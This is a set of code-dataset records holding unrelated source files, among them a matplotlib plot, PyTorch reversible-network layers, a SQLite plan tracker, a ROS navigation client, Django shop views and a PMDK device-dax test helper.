plt.plot(xLabelDateList, yLabelDateList, color='blue', linewidth=2, label='h')\r\n plt.xlabel('横轴:Ug2k(V)', fontproperties='FangSong', fontsize=20, color='r')\r\n plt.ylabel('纵轴:Ia(uA)', fontproperties='FangSong', fontsize=20, color='b')\r\n plt.plot(22.0, 1.60, 'ko')\r\n plt.text(21.0, 1.80, '(22.0,1.60)')\r\n plt.plot(30.5, 6.05, 'ko')\r\n plt.text(29.5, 6.25, '(30.5,6.05)')\r\n plt.plot(41.5, 12.00, 'ko')\r\n plt.text(40.5, 12.20, '(41.5,12.00)')\r\n plt.plot(53.0, 17.60, 'ko')\r\n plt.text(52.0, 17.80, '(53.0,17.60)')\r\n plt.plot(65.0, 23.29, 'ko')\r\n plt.text(64.0, 23.49, '(65.0,23.29)')\r\n plt.plot(77.5, 26.92, 'ko')\r\n plt.text(76.5, 27.12, '(77.5,26.92)')\r\n\r\n plt.show()\r\n\r\ndef getPeak():\r\n pass\r\n\r\n\r\ndef main():\r\n testFile()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"数据挖掘/fuck-hzfFORexp.py","file_name":"fuck-hzfFORexp.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"114073543","text":"import os\nimport glob\nfrom setuptools import setup, find_packages\n\n__version__ = None\n\npth = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n \"mdet_lsst_sim\",\n \"version.py\"\n)\nwith open(pth, 'r') as fp:\n exec(fp.read())\n\nscripts = glob.glob('bin/*')\nscripts = [s for s in scripts if '~' not in s]\n\nsetup(\n name=\"mdet_lsst_sim\",\n version=__version__,\n packages=find_packages(),\n scripts=scripts,\n author='Erin Sheldon',\n author_email='erin.sheldon@gmail.com',\n url='https://github.com/esheldon/mdet-lsst-sim',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"399238777","text":"import torch\nimport torch.nn as nn\n\n\ndef split_feature(x):\n l = x.shape[1]\n x1 = x[:, 0:l // 2, ::]\n x2 = x[:, l // 2:, ::]\n return x1, x2\n\n\ndef 
split_n_features(x, n):\n x_list = list(torch.chunk(x, n, dim=1))\n return x_list\n\n\nclass rev_part(nn.Module):\n\n def __init__(self, in_ch):\n super(rev_part, self).__init__()\n self.f1 = nn.Sequential(\n nn.Conv2d(in_ch, in_ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv2d(in_ch, in_ch, 3, padding=1),\n )\n self.g1 = nn.Sequential(\n nn.Conv2d(in_ch, in_ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv2d(in_ch, in_ch, 3, padding=1),\n )\n\n def forward(self, x):\n x1, x2 = split_feature(x)\n y1 = x1 + self.f1(x2)\n y2 = x2 + self.g1(y1)\n y = torch.cat([y1, y2], dim=1)\n return y\n\n def reverse(self, y):\n y1, y2 = split_feature(y)\n x2 = y2 - self.g1(y1)\n x1 = y1 - self.f1(x2)\n x = torch.cat([x1, x2], dim=1)\n return x\n\n\nclass f_g_layer(nn.Module):\n def __init__(self, ch):\n super(f_g_layer, self).__init__()\n self.nn_layer = nn.Sequential(\n nn.Conv3d(ch, ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv3d(ch, ch, 3, padding=1),\n )\n\n def forward(self, x):\n x = self.nn_layer(x)\n return x\n\n\nclass rev_3d_part1(nn.Module):\n\n def __init__(self, in_ch, n):\n super(rev_3d_part1, self).__init__()\n self.f = nn.ModuleList()\n self.n = n\n self.ch = in_ch\n for i in range(n):\n self.f.append(f_g_layer(in_ch // n))\n\n def forward(self, x):\n x = split_n_features(x, self.n)\n y1 = x[-1] + self.f[0](x[0])\n y = y1\n for i in range(1, self.n):\n y1 = x[(self.n - 1 - i)] + self.f[i](y1)\n y = torch.cat([y, y1], dim=1)\n return y\n\n def reverse(self, y):\n y = split_n_features(y, self.n)\n for i in range(1, self.n):\n x1 = y[self.n - i] - self.f[self.n - i](y[self.n - i - 1])\n if i == 1:\n x = x1\n else:\n x = torch.cat([x, x1], dim=1)\n x1 = y[0] - self.f[0](x[:, 0:(self.ch // self.n), ::])\n x = torch.cat([x, x1], dim=1)\n return x\n\n\nclass rev_3d_part(nn.Module):\n\n def __init__(self, in_ch):\n super(rev_3d_part, self).__init__()\n self.f1 = nn.Sequential(\n nn.Conv3d(in_ch, in_ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv3d(in_ch, in_ch, 3, padding=1),\n )\n self.g1 = nn.Sequential(\n nn.Conv3d(in_ch, in_ch, 3, padding=1),\n nn.LeakyReLU(inplace=True),\n nn.Conv3d(in_ch, in_ch, 3, padding=1),\n )\n\n def forward(self, x):\n x1, x2 = split_feature(x)\n y1 = x1 + self.f1(x2)\n y2 = x2 + self.g1(y1)\n y = torch.cat([y1, y2], dim=1)\n return y\n\n def reverse(self, y):\n y1, y2 = split_feature(y)\n x2 = y2 - self.g1(y1)\n x1 = y1 - self.f1(x2)\n x = torch.cat([x1, x2], dim=1)\n return x\n","sub_path":"RevSCI-net/my_tools.py","file_name":"my_tools.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"175439022","text":"from dbToDo import dbOperations\nimport datetime\n\nclass TrackerDbOperations(object):\n\n\t## global variables\n\tconnection = None\n\ttableName = 'Tracker'\n\tdataBaseName = 'TrackerDataBase.db'\n\tdboperations = None\n\t\t\n\t#Common DB Queries\n\tCREATE_TABLE_QUERY = \"CREATE TABLE {} (id int,createDate text,modifiedDate text , targetDate text, plan text)\".format(tableName)\n\tSELECT_QUERY = \"SELECT * from Tracker\"\n\t\n\tdef __init__(self):\n\t\tself.dboperations = dbOperations()\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tif ( self.dboperations.isSchemaAvailable(self.connection,self.tableName) == 0):\n\t\t\tself.dboperations.executeQuery(cursor,self.CREATE_TABLE_QUERY)\n\t\t\t\n\t\t\n\tdef 
addPlan(self,targetTimeStamp,plan):\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\t\n\t\tresultSet = self.listPlan()\n\t\tif len(resultSet) <= 0:\n\t\t\tID = 1\n\t\tif len(resultSet) > 0:\n\t\t\tFIND_MAXID_QUERY=\"select max(id) from {}\".format(self.tableName,id)\n\t\t\trows = self.dboperations.executeQuery(cursor,FIND_MAXID_QUERY)\n\t\t\trow = rows.fetchone()\n\t\t\tID = int(row[0]) + 1\n\t\tcreateDate = \"'\" + str(datetime.datetime.now()) +\"'\"\n\t\tmodifiedDate = \"'\" + str(datetime.datetime.now())+\"'\"\n\t\ttargetDate = \"'\" + targetTimeStamp +\"'\" \n\t\tplan = \"'\" + plan +\"'\" \n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tADD_PLAN_QUERY = \"INSERT INTO {}(id ,createDate,modifiedDate,targetDate,plan) VALUES({},{},{},{},{})\".format(self.tableName,ID,createDate,modifiedDate,targetDate,plan)\n\t\tc = self.dboperations.executeQuery(cursor,ADD_PLAN_QUERY)\n\t\tself.connection.commit()\n\t\t\n\tdef listPlan(self):\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tcursor = self.dboperations.executeQuery(cursor,self.SELECT_QUERY)\n\t\tresultSet = cursor.fetchall()\n\t\treturn resultSet\n\n\tdef deletePlan(self,id):\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tDELETE_QUERY=\"DELETE from {} where id={}\".format(self.tableName,id)\n\t\tcursor = self.dboperations.executeQuery(cursor,DELETE_QUERY)\n\t\tself.connection.commit()\n\n\tdef updatePlan(self,planDateTime,plan,id):\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tmodifiedDate = str(datetime.datetime.now())\n\t\ttargetDate = planDateTime\n\t\tUPDATE_QUERY= \"UPDATE {} SET targetDate='{}', modifiedDate='{}', plan='{}' WHERE id={}\".format(self.tableName,targetDate,modifiedDate,plan,id)\n\t\tcursor = self.dboperations.executeQuery(cursor,UPDATE_QUERY)\n\t\tself.connection.commit()\n\n\tdef deleteExpiredplan(self):\n\t\tdateFormat = '%Y-%m-%d %H:%M:%S'\n\t\tself.connection = self.dboperations.connectToDB(self.dataBaseName)\n\t\tcursor = self.dboperations.getCursor(self.connection)\n\t\tcursor = self.dboperations.executeQuery(cursor,self.SELECT_QUERY)\n\t\tresultSet = cursor.fetchall()\n\t\tfor row in resultSet:\n\t\t\tid = row[0]\n\t\t\ttargetTimeStamp = datetime.datetime.strptime(row[3], dateFormat)\n\t\t\tcurrentTimeStamp = datetime.datetime.now()\n\t\t\tif(targetTimeStamp < currentTimeStamp):\n\t\t\t\tDELETE_QUERY=\"DELETE from {} where id={}\".format(self.tableName,id)\n\t\t\t\tcursor = self.dboperations.executeQuery(cursor,DELETE_QUERY)\n\t\t\t\tself.connection.commit()\n\t\treturn \"deleted all Expired plan\"\n\n# Functionality to be implemented later\t\t\t\t\n\tdef sendReminder(self):\n\t\t#send an email as reminder \n\t\tpass\n","sub_path":"trackerDBoperations.py","file_name":"trackerDBoperations.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"601502133","text":"#!/usr/bin/env python3\n\nimport rospy\nimport actionlib\nfrom actionlib_msgs.msg import GoalStatus\nfrom move_base_msgs.msg import MoveBaseAction\nfrom move_base_msgs.msg import MoveBaseActionGoal\nfrom move_base_msgs.msg import MoveBaseGoal\nfrom move_base_msgs.msg import MoveBaseActionFeedback\nfrom 
move_base_msgs.msg import MoveBaseActionResult\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import Quaternion\nfrom nav_msgs.srv import GetMap, GetPlan\nfrom std_msgs.msg import Bool\nimport tf\nfrom math import pi, cos, sin, sqrt, atan2\nimport numpy as np\n\nclass Explorer:\n def __init__(self):\n\t\n self.psoe_sub = rospy.Subscriber(\"target_pose\", Point, self.pose_cb)\n self.status_pub = rospy.Publisher(\"navigation_result\", Bool, queue_size = 5)\n self.client = actionlib.SimpleActionClient('move_base',MoveBaseAction)\n self.client.wait_for_server()\n self.target_pose = (0,0,0)\n\n def pose_cb(self,data):\n self.target_pose = (data.x, data.y, data.z)\n self.explore()\n\n def explore(self):\n print(self.target_pose)\n status = self.reach_goal(self.target_pose)\n status_msg = Bool()\n print(status)\n print(type(status))\n if(status == True or status == 3):\n print(\"I successfuly reached goal\")\n status_msg.data = True\n else:\n print(\"Move base failed with status : {}\".format(status))\n status_msg.data = False\n # status_msg.data = True\n # self.client.cancel_goal()\n rospy.sleep(0.1)\n self.status_pub.publish(status_msg)\n\n def reach_goal(self, goal_pose):\n x, y, theta = goal_pose\n target_quat = tf.transformations.quaternion_from_euler(0, 0, theta)\n\n t0=rospy.Time.now()\n goal=MoveBaseGoal()\n goal.target_pose.header.stamp=t0\n goal.target_pose.header.frame_id=\"map\"\n\t\n goal.target_pose.pose.position = Point(x, y, 0)\n goal.target_pose.pose.orientation.x = target_quat[0]\n goal.target_pose.pose.orientation.y = target_quat[1]\n goal.target_pose.pose.orientation.z = target_quat[2]\n goal.target_pose.pose.orientation.w = target_quat[3] \n\n # Sends the goal to the action server.\n self.client.send_goal(goal)\n\n # Waits for the server to finish performing the action.\n # let us wait 1 minute to reach the goal and abort otherwise\n reached_the_goal = self.client.wait_for_result(rospy.Duration.from_sec(90))\n if not reached_the_goal:\n rospy.logwarn(\"I was not able to reach the goal within the\\\n allocated time\")\n self.client.cancel_goal()\n \n # Prints out the result of executing the action\n return self.client.get_state()\n\n\nif __name__ == '__main__':\n rospy.init_node('movebase_client_py')\n explorer = Explorer()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n\n \n","sub_path":"navigation/src/move_base_controller.py","file_name":"move_base_controller.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"427751656","text":"\n\nclass View:\n\n def get_user_entry(self, msg_display, msg_error, value_type, assertions=None, default_value=None):\n while True:\n value = input(msg_display)\n if value_type == \"numeric\":\n if value.isnumeric():\n value = int(value)\n return value\n else:\n print(msg_error)\n continue\n if value_type == \"num_superior\":\n if value.isnumeric():\n value = int(value)\n if value >= default_value:\n return value\n else:\n print(msg_error)\n continue\n else:\n print(msg_error)\n continue\n if value_type == \"string\":\n try:\n float(value)\n print(msg_error)\n continue\n except ValueError:\n return value\n elif value_type == \"date\":\n if self.verify_date(value):\n return value\n else:\n print(msg_error)\n continue\n elif value_type == \"selection\":\n if value in assertions:\n return value\n else:\n print(msg_error)\n continue\n\n @staticmethod\n def 
verify_date(value_to_test):\n if \"-\" not in value_to_test:\n return False\n else:\n splitted_date = value_to_test.split(\"-\")\n for date in splitted_date:\n if not date.isnumeric():\n return False\n return True\n\n @staticmethod\n def build_selection(iterable: list, display_msg: str, assertions: list) -> dict:\n display_msg = display_msg\n assertions = assertions\n\n for i, data in enumerate(iterable):\n display_msg = display_msg + f\"{i+1} - {data['name']}\\n\"\n assertions.append(str(i + 1))\n\n return {\n \"msg\": display_msg,\n \"assertions\": assertions\n }\n","sub_path":"views/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"195054321","text":"from builtins import str\nfrom builtins import object\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom qgis.core import *\n\nfrom datetime import datetime\nfrom datetime import timedelta\n\n#Convenient function to debug\nlog = lambda m: QgsMessageLog.logMessage(m, \"visualist\")\n\nEXCEL = ['ExcelDate', 'ExcelTime', 'ExcelDateTime']\nDATE = [EXCEL[0], '%d.%m.%Y', '%d-%m-%Y']\nTIME = [EXCEL[1], '%H:%M:%S']\nDURATION = [EXCEL[1], '%S', '%H:%M:%S']\nDATETIME = [EXCEL[2], '%d.%m.%y %H:%M:%S', '%d.%m.%Y %H:%M:%S', '%d/%m/%Y %H:%M:%S', '%Y-%m-%d %H:%M:%S']\n\nT1 = 'time1'\nT2 = 'time2'\nD1 = 'date1'\nD2 = 'date2'\nDUR = 'duration'\nFEAT = 'feature'\n\n#time = (year,month,day,hour,minute,second)\nclass temporalAnalyser(object):\n\n def __init__(self, layer, feedback):\n\n self.feedback = feedback\n\n self.fields = {D1:None, T1:None, D2:None, T2:None, DUR:None}\n self.formats = {D1:None, T1:None, D2:None, T2:None, DUR:None}\n self.parsed = {} #key: feature id, value: parsed {D1:None, T1:None, D2:None, T2:None, DUR:None}\n self.empty = {D1:0, T1:0, D2:0, T2:0, DUR:0} #To show number of missing data\n\n self.dataLayer = layer\n self.dataId = layer.id()\n\n def tr(self, text, context = \"temporalAnalyser\"):\n return QApplication.translate(context, text)\n\n def setLayer(self, layer):\n self.dataLayer = layer\n\n def parse(self):\n provider = self.dataLayer.dataProvider()\n for feat in provider.getFeatures():\n self.parseFeature(feat)\n error = \"\"+self.tr(\"Empty or unparsable values\")+\":
\"\n e = False\n for k, v in self.empty.items():\n if v > 0: e = True\n error += \"\" + str(v) + \" \"+self.tr(\"values for\")+\" \" + str(k).upper() + \"
\"\n if e:\n self.feedback.reportError(self.tr('{}').format(error))\n\n def parseFeature(self, feat):\n line = {D1:None, T1:None, D2:None, T2:None, DUR:None}\n attrMap = feat.attributes()\n provider = self.dataLayer.dataProvider()\n for key, v in self.fields.items():\n if v == None:\n continue\n k = provider.fieldNameIndex(v)\n value = attrMap[int(k)]\n\n format = self.formats[key]\n if format in EXCEL:\n try: parsed = xlToDt(value, format)\n except: parsed = None\n else:\n if str(format) == '%S':\n t = int(value)\n h = int(t / 3600)\n m = int((t-h * 3600) / 60)\n s = int(t - h * 3600 - m * 60)\n parsed = datetime(1900, 1, 1, h, m, s)\n else:\n parsed = datetime.strptime(str(value), str(format))\n if parsed is None:\n self.empty[key] += 1\n line[key] = parsed\n self.parsed[feat.id()] = line\n\n\n def setDateTime(self, date1, time1):\n self.fields['date1'] = date1\n self.fields['time1'] = time1\n\n def setDateTimeDuration(self, date1, time1, duration):\n self.setDateTime(date1, time1)\n self.fields['duration'] = duration\n self.fields['date2'] = None\n self.fields['time2'] = None\n\n def setDateTimes(self, date1, time1, date2, time2):\n self.setDateTime(date1, time1)\n self.fields['date2'] = date2\n self.fields['time2'] = time2\n self.fields['duration'] = None\n\n def setFormatersDateTime(self, date1, time1):\n self.formats['date1'] = date1\n self.formats['time1'] = time1\n\n def setFormatersDateTimeDuration(self, date1, time1, duration):\n self.setFormatersDateTime(date1, time1)\n self.formats['duration'] = duration\n self.formats['date2'] = None\n self.formats['time2'] = None\n\n def setFormatersDateTimes(self, date1, time1, date2, time2):\n self.setFormatersDateTime(date1, time1)\n self.formats['date2'] = date2\n self.formats['time2'] = time2\n self.formats['duration'] = None\n\ndef getDates(data, i):\n dt1,dt2 = None, None\n if data[D1][i] is not None:\n if data[T1][i] is not None and len(data[T1]) > 0:\n dt1 = datetime.combine(data[D1][i].date(), data[T1][i].time())\n else:\n dt1 = data[D1][i]\n elif data[T1][i] is not None:\n dt1 = data[T1][i]\n\n if data[D2][i] is not None and len(data[D2]) > 0:\n if data[T2][i] is not None and len(data[T2]) > 0:\n dt2 = datetime.combine(data[D2][i].date(), data[T2][i].time())\n else:\n dt2 = data[D2][i]\n elif data[DUR][i] is not None and len(data[DUR]) > 0:\n if dt1 is not None:\n t = data[DUR][i].time()\n delta = timedelta(hours=t.hour,minutes=t.minute, seconds=t.second)\n dt2 = dt1 + delta\n if dt2 is None: dt2 = dt1\n return [dt1, dt2]\n\ndef xlToDt(excel, type):\n if excel is None or len(excel) == 0:\n return None\n t = xlrd.xldate_as_tuple(float(excel), 0)\n #self.warning(str(excel)+\" -> \"+str(t))\n if type == EXCEL[0]:\n return datetime(t[0], t[1], t[2], 0, 0, 0)\n elif type == EXCEL[1]:\n return datetime(1900, 1, 1, t[3], t[4], t[5])\n elif type == EXCEL[2]:\n return datetime(t[0], t[1], t[2], t[3], t[4], t[5])\n else:\n return None\n","sub_path":"TimeFormater.py","file_name":"TimeFormater.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"476690605","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404,redirect\nfrom django.contrib.auth.models import User\nfrom .models import *\nimport random\n\nfrom django.contrib import messages\nimport string\nfrom .forms import *\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.forms import 
AuthenticationForm, authenticate\nfrom django.contrib.auth import logout, login\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\n\n\n# Create your views here.\ndef create_ref_code():\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=20))\n\n\ndef log_in(request):\n if request.method == 'POST':\n ak = AuthenticationForm(data=request.POST,request=request)\n if ak.is_valid():\n username = ak.cleaned_data.get('username')\n password = ak.cleaned_data.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('product')\n else:\n messages.error(request,'Invalid credentials')\n return redirect('login')\n else:\n ak = AuthenticationForm()\n return render(request, 'user/login.html', {'pl': ak})\n\n\ndef log_out(request):\n if request.user:\n logout(request)\n return redirect('product')\n else:\n return redirect('login')\n\n\ndef register(request):\n if request.method == 'POST':\n ak = regi(request.POST)\n if ak.is_valid():\n ak.save()\n messages.success(request,'user successfully created')\n return redirect('login')\n else:\n messages.error(request,'user not created due to values you gave or username already exist')\n return redirect('register')\n else:\n ak = regi()\n return render(request, 'user/register.html', {'pok': ak})\n\n\nfrom random import shuffle\n\ndef homeview(request):\n categoy = category.objects.get(name='clothes')\n prod = item.objects.filter(cat_name=categoy)\n categ = category.objects.get(name='electronics')\n frod = item.objects.filter(cat_name=categ)\n return render(request, 'shop/product.html', {'prod': prod,'frod':frod})\n\n\ndef productview(request):\n prod = item.objects.all()\n return render(request, 'shop/product2.html', {'prod': prod})\n\n\ndef detailview(request, name):\n categ = category.objects.get(name='electronics')\n frod = item.objects.filter(cat_name=categ)\n prod = get_object_or_404(item,namee=name)\n return render(request, 'shop/detail.html', {'a': prod,'frod':frod})\n\n\ndef categoryview(request):\n cat = category.objects.all().order_by('name')\n return render(request, 'shop/cat_list.html', {'cat': cat})\n\n\ndef catprod(request,name):\n gro = category.objects.get(name=name)\n prod = item.objects.filter(cat_name=gro)\n return render(request, 'shop/cat_product.html', {'cat': prod})\n\n@login_required(login_url='/login')\ndef cartsview(request):\n ca = cart.objects.filter(name=request.user)\n grand_total = 0\n print(ca)\n for a in ca:\n grand_total += a.price\n return render(request, 'shop/cart.html', {'cd': ca,'g':grand_total})\n\n@login_required(login_url='/login')\ndef cartsedit(request, name):\n pro = item.objects.get(namee=name)\n ca = cart.objects.filter(item_name=pro)\n if ca:\n b = cart.objects.get(item_name=pro)\n if b.quantity > 1:\n b.quantity -= 1\n b.price = b.price - b.item_name.price\n b.save()\n messages.success(request,'product remove from cart')\n return HttpResponseRedirect('/cart')\n else:\n b.delete()\n messages.success(request,'product deleted from cart')\n return HttpResponseRedirect('/cart')\n\n\n# product try view\n@login_required(login_url='/login')\ndef producttryview(request, name):\n pro = item.objects.get(namee=name)\n if troy.objects.filter(item_name=pro).exists():\n messages.success(request, 'sorry sir this product is already on your try list')\n return redirect('try')\n elif troy.objects.create(user=request.user, item_name=pro):\n messages.success(request, 'product add to try list')\n return 
redirect('try')\n\n@login_required(login_url='/login')\ndef triedview(request):\n tt = troy.objects.filter(user=request.user)\n return render(request, 'shop/try.html', {'tt': tt})\n\n@login_required(login_url='/login')\ndef cartsdelete(request, name):\n pro = item.objects.get(namee=name)\n ca = cart.objects.filter(item_name=pro)\n if ca:\n b = cart.objects.get(item_name=pro)\n b.delete()\n messages.success(request, 'product deleted from cart')\n return HttpResponseRedirect('/cart')\n else:\n return HttpResponseRedirect('/product')\n\n\n# add to cart\n@login_required(login_url='/login')\ndef carts_item(request, name):\n pro = item.objects.get(namee=name)\n ca = cart.objects.filter(item_name=pro)\n if ca:\n b = cart.objects.get(item_name=pro)\n b.quantity += 1\n b.price += b.item_name.price\n b.save()\n messages.success(request, 'add to cart successfully')\n return HttpResponseRedirect('/cart')\n elif cart.objects.create(name=request.user, item_name=pro,price=pro.price):\n return HttpResponseRedirect('/cart')\n\n@login_required(login_url='/login')\ndef checkoutview(request):\n try:\n loca = item.objects.all()\n ca = cart.objects.filter(name=request.user)\n if request.method == 'POST':\n ap = addresses(request.POST)\n if ap.is_valid():\n adress1 = ap.cleaned_data.get('address1')\n adress2 = ap.cleaned_data.get('address2')\n zip_code = ap.cleaned_data.get('zip_code')\n state = ap.cleaned_data.get('state')\n country = ap.cleaned_data.get('country')\n po = address(name=request.user, address1=adress1, address2=adress2, zip_code=zip_code, state=state,\n country=country)\n\n po.save()\n pd = create_ref_code()\n for a in ca:\n ak =a.item_name\n pa = order.objects.create(itemss=ak,quantity=a.quantity,name=request.user, addressa=po, product_id=pd,ordered=True)\n pa.save()\n ca.delete()\n return HttpResponseRedirect('/payment')\n else:\n ap = addresses()\n return render(request, 'shop/checkout.html', {'ap': ap})\n except ObjectDoesNotExist:\n return HttpResponse('object does not exist')\n\n@login_required(login_url='/login')\ndef send_try(request, name):\n pro = item.objects.get(namee=name)\n ca = troy.objects.get(item_name=pro)\n if ca.tried_complete == True:\n messages.success(request, 'you already tried this product please choose another one')\n return HttpResponseRedirect('/try')\n elif ca:\n ca.tried_complete = True\n ca.save()\n messages.success(request, 'please give us reviews')\n return HttpResponseRedirect('/try')\n\n\n else:\n return HttpResponseRedirect('try')\n\n\ndef home(request):\n return render(request, 'shop/home.html')\n\n# def curtaclan():\n# ak = len(cart.objects.filter(name=request.user))\n\n\ndef payme(request):\n ap = order.objects.filter(ordered=False)\n print(ap)\n return render(request, 'shop/payment.html')\n\n\ndef aboutus(request):\n return render(request, 'shop/payment.html')\ndef contact(request):\n return render(request, 'shop/payment.html')\n\ndef search(request):\n if request.method == 'GET':\n sear = request.GET['namee']\n ap = item.objects.filter(namee__startswith=sear)\n return render(request, 'shop/search.html',{'s':ap})\n else:\n return HttpResponse('thers noting here like that')\n","sub_path":"aladin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"151859349","text":"#\n# Copyright 2019-2020, Intel Corporation\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the 
following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\n\"\"\"Device dax context classes and utilities\"\"\"\n\nimport copy\nimport itertools\nimport os\nimport sys\n\nimport context as ctx\nimport futils\nimport tools\n\n\nclass DevDax():\n \"\"\"\n Class representing dax device and its parameters\n \"\"\"\n def __init__(self, name, alignment=None, min_size=None, max_size=None):\n self.name = name\n self.path = None\n self._req_alignment = alignment\n self._req_min_size = min_size\n self._req_max_size = max_size\n self.assigned = False\n\n def __str__(self):\n return self.name\n\n def try_assign(self, path):\n \"\"\"\n Try assigning to real dax device, identified by its path,\n provided it meets defined requirements. In case of success, set DevDax\n object attributes (like size and/or alignment) to the real dax device\n values and return True. Return False otherwise.\n \"\"\"\n ndctl = tools.Ndctl()\n\n p_size = ndctl.get_dev_size(path)\n p_align = ndctl.get_dev_alignment(path)\n\n if self._req_min_size and p_size < self._req_min_size:\n return False\n if self._req_max_size and p_size > self._req_max_size:\n return False\n if self._req_alignment and p_align != self._req_alignment:\n return False\n\n self.path = path\n self.size = p_size\n self.alignment = p_align\n self.assigned = True\n return True\n\n\nclass DevDaxes():\n \"\"\"\n Dax device context class representing a set of dax devices required\n for test\n \"\"\"\n def __init__(self, *dax_devices):\n self.dax_devices = tuple(dax_devices)\n for dd in dax_devices:\n setattr(self, dd.name, dd)\n\n def setup(self, **kwargs):\n tools = kwargs['tools']\n for dd in self.dax_devices:\n proc = tools.pmemdetect('-d', dd.path)\n if proc.returncode != 0:\n raise futils.Fail('checking {} with pmemdetect failed:{}{}'\n .format(dd.path, os.linesep, proc.stdout))\n\n def __str__(self):\n return 'devdax'\n\n @classmethod\n def filter(cls, config, msg, tc):\n\n dax_devices, _ = ctx.get_requirement(tc, 'devdax', ())\n if not dax_devices:\n return ctx.NO_CONTEXT\n elif sys.platform == 'win32' and tc.enabled:\n raise futils.Fail('dax device functionality required by \"{}\" is '\n 'not available on Windows. 
Please disable the '\n 'test for this platform'.format(tc))\n\n if not config.device_dax_path:\n raise futils.Skip('No dax devices defined in testconfig')\n\n if len(dax_devices) > len(config.device_dax_path):\n raise futils.Skip('Not enough dax devices defined in testconfig '\n '({} needed)'.format(len(dax_devices)))\n\n ndctl = tools.Ndctl()\n for c in config.device_dax_path:\n if not ndctl.is_devdax(c):\n raise futils.Fail('{} is not a dax device'.format(c))\n\n assigned = _try_assign_by_requirements(config.device_dax_path,\n dax_devices)\n if not assigned:\n raise futils.Skip('Dax devices in test configuration do not '\n 'meet test requirements')\n\n return [DevDaxes(*assigned), ]\n\n\ndef _try_assign_by_requirements(configured, required):\n \"\"\"\n Try assigning dax devices defined as paths in test configuration to\n dax device objects taking their requirements into account.\n Return a sequence of all requirement objects if they were\n successfully assigned to existing dax, otherwise return None.\n Since the order in which requirement objects are tried to be\n assigned may affect the final outcome, all permutations are checked.\n \"\"\"\n permutations = itertools.permutations(required)\n for p in permutations:\n conf_copy = configured[:]\n req_copy = copy.deepcopy(p)\n for dd in req_copy:\n for i, c in enumerate(conf_copy):\n if dd.try_assign(c):\n conf_copy.pop(i)\n break\n\n if not dd.assigned:\n # at least one device dax requirement cannot be assigned\n # to any of devices defined in the configuration,\n # try another 